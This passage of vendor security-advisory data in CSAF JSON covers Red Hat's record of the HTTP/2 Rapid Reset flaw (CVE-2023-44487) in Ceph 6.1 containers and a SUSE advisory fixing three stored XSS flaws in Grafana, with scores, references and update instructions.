"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-44487"
},
{
"category": "external",
"summary": "RHBZ#2242803",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242803"
},
{
"category": "external",
"summary": "RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-44487",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44487"
},
{
"category": "external",
"summary": "https://github.com/dotnet/announcements/issues/277",
"url": "https://github.com/dotnet/announcements/issues/277"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2023-2102",
"url": "https://pkg.go.dev/vuln/GO-2023-2102"
},
{
"category": "external",
"summary": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487",
"url": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487"
},
{
"category": "external",
"summary": "https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/",
"url": "https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2023-10-10T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-12-12T13:55:37+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
},
{
"category": "workaround",
"details": "Users are strongly urged to update their software as soon as fixes are available. \nThere are several mitigation approaches for this flaw. \n\n1. If circumstances permit, users may disable http2 endpoints to circumvent the flaw altogether until a fix is available.\n2. IP-based blocking or flood protection and rate control tools may be used at network endpoints to filter incoming traffic.\n3. Several package specific mitigations are also available. \n a. nginx: https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/\n b. netty: https://github.com/netty/netty/security/advisories/GHSA-xpw8-rcwv-8f8p\n c. haproxy: https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487\n d. nghttp2: https://github.com/nghttp2/nghttp2/security/advisories/GHSA-vx74-f528-fxqg\n e. golang: The default stream concurrency limit in golang is 250 streams (requests) per HTTP/2 connection. This value may be adjusted in the golang.org/x/net/http2 package using the Server.MaxConcurrentStreams setting and the ConfigureServer function which are available in golang.org/x/net/http2.",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-10-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Important"
}
],
"title": "HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)"
}
]
}
SUSE-SU-2023:1902-1
Vulnerability from csaf_suse - Published: 2023-04-19 03:08 - Updated: 2023-04-19 03:08Summary
Security update for SUSE Manager Client Tools
Severity
Important
Notes
Title of the patch: Security update for SUSE Manager Client Tools
Description of the patch: This update fixes the following issues:
grafana version update from 8.5.20 to 8.5.22:
- Security issues fixed:
* CVE-2023-1410: Fix XSS in Graphite functions tooltip (bsc#1209645)
* CVE-2023-0507: Apply attribute sanitation to GeomapPanel (bsc#1208821)
* CVE-2023-0594: Avoid storing XSS in TraceView panel (bsc#1208819)
- The following non-security bug was fixed:
* Login: Fix panic when UpsertUser is called without ReqContext
Patchnames: SUSE-2023-1902,SUSE-SLE-Manager-Tools-12-2023-1902
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.3 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.7 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
16 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for SUSE Manager Client Tools",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\ngrafana version update from 8.5.20 to 8.5.22:\n\n- Security issues fixed:\n * CVE-2023-1410: Fix XSS in Graphite functions tooltip (bsc#1209645)\n * CVE-2023-0507: Apply attribute sanitation to GeomapPanel (bsc#1208821)\n * CVE-2023-0594: Avoid storing XSS in TraceView panel (bsc#1208819)\n\n- The following non-security bug was fixed:\n * Login: Fix panic when UpsertUser is called without ReqContext\n \n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2023-1902,SUSE-SLE-Manager-Tools-12-2023-1902",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2023_1902-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2023:1902-1",
"url": "https://www.suse.com/support/update/announcement/2023/suse-su-20231902-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2023:1902-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2023-April/028875.html"
},
{
"category": "self",
"summary": "SUSE Bug 1208819",
"url": "https://bugzilla.suse.com/1208819"
},
{
"category": "self",
"summary": "SUSE Bug 1208821",
"url": "https://bugzilla.suse.com/1208821"
},
{
"category": "self",
"summary": "SUSE Bug 1209645",
"url": "https://bugzilla.suse.com/1209645"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-0507 page",
"url": "https://www.suse.com/security/cve/CVE-2023-0507/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-0594 page",
"url": "https://www.suse.com/security/cve/CVE-2023-0594/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1410 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1410/"
}
],
"title": "Security update for SUSE Manager Client Tools",
"tracking": {
"current_release_date": "2023-04-19T03:08:57Z",
"generator": {
"date": "2023-04-19T03:08:57Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2023:1902-1",
"initial_release_date": "2023-04-19T03:08:57Z",
"revision_history": [
{
"date": "2023-04-19T03:08:57Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "grafana-8.5.22-1.45.1.aarch64",
"product": {
"name": "grafana-8.5.22-1.45.1.aarch64",
"product_id": "grafana-8.5.22-1.45.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-8.5.22-1.45.1.i586",
"product": {
"name": "grafana-8.5.22-1.45.1.i586",
"product_id": "grafana-8.5.22-1.45.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-8.5.22-1.45.1.ppc64le",
"product": {
"name": "grafana-8.5.22-1.45.1.ppc64le",
"product_id": "grafana-8.5.22-1.45.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-8.5.22-1.45.1.s390x",
"product": {
"name": "grafana-8.5.22-1.45.1.s390x",
"product_id": "grafana-8.5.22-1.45.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-8.5.22-1.45.1.x86_64",
"product": {
"name": "grafana-8.5.22-1.45.1.x86_64",
"product_id": "grafana-8.5.22-1.45.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Client Tools 12",
"product": {
"name": "SUSE Manager Client Tools 12",
"product_id": "SUSE Manager Client Tools 12"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-8.5.22-1.45.1.aarch64 as component of SUSE Manager Client Tools 12",
"product_id": "SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64"
},
"product_reference": "grafana-8.5.22-1.45.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-8.5.22-1.45.1.ppc64le as component of SUSE Manager Client Tools 12",
"product_id": "SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le"
},
"product_reference": "grafana-8.5.22-1.45.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-8.5.22-1.45.1.s390x as component of SUSE Manager Client Tools 12",
"product_id": "SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x"
},
"product_reference": "grafana-8.5.22-1.45.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-8.5.22-1.45.1.x86_64 as component of SUSE Manager Client Tools 12",
"product_id": "SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
},
"product_reference": "grafana-8.5.22-1.45.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 12"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-0507",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-0507"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. \n\nStarting with the 8.1 branch, Grafana had a stored XSS vulnerability affecting the core plugin GeoMap. \n\nThe stored XSS vulnerability was possible due to map attributions weren\u0027t properly sanitized and allowed arbitrary JavaScript to be executed in the context of the currently authorized user of the Grafana instance. \n\nAn attacker needs to have the Editor role in order to change a panel to include a map attribution containing JavaScript. \n\nThis means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. \n\nUsers may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-0507",
"url": "https://www.suse.com/security/cve/CVE-2023-0507"
},
{
"category": "external",
"summary": "SUSE Bug 1208821 for CVE-2023-0507",
"url": "https://bugzilla.suse.com/1208821"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2023-04-19T03:08:57Z",
"details": "important"
}
],
"title": "CVE-2023-0507"
},
{
"cve": "CVE-2023-0594",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-0594"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. \n\nStarting with the 7.0 branch, Grafana had a stored XSS vulnerability in the trace view visualization. \n\nThe stored XSS vulnerability was possible due the value of a span\u0027s attributes/resources were not properly sanitized and this will be rendered when the span\u0027s attributes/resources are expanded.\n\nAn attacker needs to have the Editor role in order to change the value of a trace view visualization to contain JavaScript. \n\nThis means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. \n\nUsers may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix. \n\n",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-0594",
"url": "https://www.suse.com/security/cve/CVE-2023-0594"
},
{
"category": "external",
"summary": "SUSE Bug 1208819 for CVE-2023-0594",
"url": "https://bugzilla.suse.com/1208819"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2023-04-19T03:08:57Z",
"details": "important"
}
],
"title": "CVE-2023-0594"
},
{
"cve": "CVE-2023-1410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1410"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. \n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description. \n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1410",
"url": "https://www.suse.com/security/cve/CVE-2023-1410"
},
{
"category": "external",
"summary": "SUSE Bug 1209645 for CVE-2023-1410",
"url": "https://bugzilla.suse.com/1209645"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.aarch64",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.ppc64le",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.s390x",
"SUSE Manager Client Tools 12:grafana-8.5.22-1.45.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2023-04-19T03:08:57Z",
"details": "moderate"
}
],
"title": "CVE-2023-1410"
}
]
}
Loading…
Loading…
